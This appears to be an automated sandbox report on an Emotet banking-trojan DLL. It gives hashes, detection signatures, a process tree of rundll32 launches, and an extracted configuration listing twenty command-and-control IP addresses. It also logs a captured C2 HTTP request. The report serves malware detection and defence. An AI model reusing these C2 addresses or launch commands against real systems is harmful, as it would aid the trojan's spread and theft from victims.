Play interactive tour

Edit tour

Windows Analysis Report MakbLShaqA

Overview

General Information

Sample Name:	MakbLShaqA (renamed file extension from none to dll)
Analysis ID:	528565
MD5:	d8f093871cd90d160aa42b945f68e229
SHA1:	bed9b13fc1caeab0d9ee69c7ee9a3fc7939c04d5
SHA256:	778db11e074622c21181ac26eaead6bb1c8e60d4aee8b7df810ffffbd03b2064
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Emotet RunDLL32 Process Creation

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Program does not show much activity (idle)

IP address seen in connection with other malware

PE file contains an invalid checksum

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Potential key logger detected (key state polling based)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 3124 cmdline: loaddll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 1440 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4596 cmdline: rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6520 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

wuapihost.exe (PID: 6520 cmdline: C:\Windows\System32\wuapihost.exe -Embedding MD5: 85C9C161B102A164EC09A23CACDDD09E)

rundll32.exe (PID: 1368 cmdline: rundll32.exe C:\Users\user\Desktop\MakbLShaqA.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6596 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mcnqzbpvvtpxkg\ymhrqw.pgj",wpBD MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 404 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mcnqzbpvvtpxkg\ymhrqw.pgj",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 6864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6208 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2248 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6844 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.1189207323.0000000004720000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.673846503.0000000005340000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1189697004.0000000004ED0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.675902171.00000000047D0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.673692438.0000000005180000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.673414231.0000000004E10000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.671474262.0000000000EE0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.673772227.00000000051E0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1191193523.0000000005280000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1188619609.0000000000C40000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1192917717.00000000054B0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1190789322.0000000005130000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1190983661.0000000005190000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.673534046.0000000004F20000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1191434317.00000000053A0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1189594475.0000000004DF0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.672601122.00000000011E0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.rundll32.exe.47d0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.51e0000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5280000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4e10000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.ee0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4720000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4ed0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5130000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5190000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5190000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4df0000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.53a0000.14.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5280000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.ee0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4e10000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.5340000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4df0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.c40000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4720000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.c40000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4f20000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.5180000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.11e0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.11e0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4ed0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.5340000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.53a0000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4f20000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.54b0000.16.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5130000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.54b0000.16.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.5180000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.47d0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.51e0000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 29 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mcnqzbpvvtpxkg\ymhrqw.pgj",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mcnqzbpvvtpxkg\ymhrqw.pgj",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mcnqzbpvvtpxkg\ymhrqw.pgj",wpBD, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6596, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mcnqzbpvvtpxkg\ymhrqw.pgj",Control_RunDLL, ProcessId: 404

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 8.2.rundll32.exe.5280000.12.raw.unpack

Malware Configuration Extractor: Emotet {"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Machine Learning detection for sample

Show sources

Source: MakbLShaqA.dll

Joe Sandbox ML: detected

Source: MakbLShaqA.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.4:49764 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_100331CA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,		2_2_100331CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04811A80 FindFirstFileW,		8_2_04811A80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49764 -> 51.178.61.60:443

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 51.178.61.60 187

Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 51.178.61.60:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 45.79.33.48:8080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 177.72.80.14:7080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: EcobandGH EcobandGH

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: global traffic

HTTP traffic detected: GET /SYSKBGIBxTUBdowZhTVfUaAYAEzgMuUlGOoLKDNLDTiFBTiWsXq HTTP/1.1Cookie: pFNpWfeVbHpase=BzroNbYOJlBeluUL21kf9bz/C9WCFsKtU3z4ZqWj1NAsmCYb46qGL4zo0otRiHL4wrBYdVMwTgrom4ILJC5Rh7kKbkp0hGijjV2ibTQJQT1b4cFT3IbmGojFIBff8vHMomGHxrv/I+8TgUg/iTHeNJSRv1mmk2PEFLzT2UUEQbG/kba0ePHqXmCT2M1YkajCceeut5bhg1Wlhj+CS8cGpwD+0qYOl0+dWBzKNb3WhUeTCqp2NZACjt06p/rDs9cWjNL4hcOMzf/2kxY/Q3UiJIrDSTrt96o/itjI5f00uDijyNSx7HzV5A==Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 196.44.98.190 196.44.98.190

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60

Source: svchost.exe, 0000000F.00000003.785632962.000001AFFBB74000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000F.00000003.785632962.000001AFFBB74000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000F.00000003.785632962.000001AFFBB74000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.785606963.000001AFFBB9F000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z\|\|.\|\|797d024d-8c74-4faa-b6a6-08435801478b\|\|1152921505694213184\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000F.00000003.785632962.000001AFFBB74000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.785606963.000001AFFBB9F000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z\|\|.\|\|797d024d-8c74-4faa-b6a6-08435801478b\|\|1152921505694213184\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: rundll32.exe, rundll32.exe, 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.671940054.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.676274983.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.1193366310.0000000010056000.00000002.00020000.sdmp, MakbLShaqA.dll	String found in binary or memory: http://www.yahoo.com equals www.yahoo.com (Yahoo)

Source: svchost.exe, 0000000F.00000002.800779486.000001AFFB2EC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000000F.00000003.780940609.000001AFFBB7F000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: rundll32.exe, rundll32.exe, 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.671940054.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.676274983.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.1193366310.0000000010056000.00000002.00020000.sdmp, MakbLShaqA.dll	String found in binary or memory: http://www.yahoo.com
Source: svchost.exe, 0000000F.00000003.780940609.000001AFFBB7F000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000F.00000003.780940609.000001AFFBB7F000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000000F.00000003.780940609.000001AFFBB7F000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000000F.00000003.782138696.000001AFFBBD1000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.782167788.000001AFFBB99000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.782205391.000001AFFC002000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.782120718.000001AFFBBD1000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.782195700.000001AFFBB77000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.782175989.000001AFFBBBA000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_04821027 InternetReadFile,

8_2_04821027

Source: global traffic

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.4:49764 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_10013EC9 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,

2_2_10013EC9

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.47d0000.0.raw.unpack, type: UNPACKEDPE
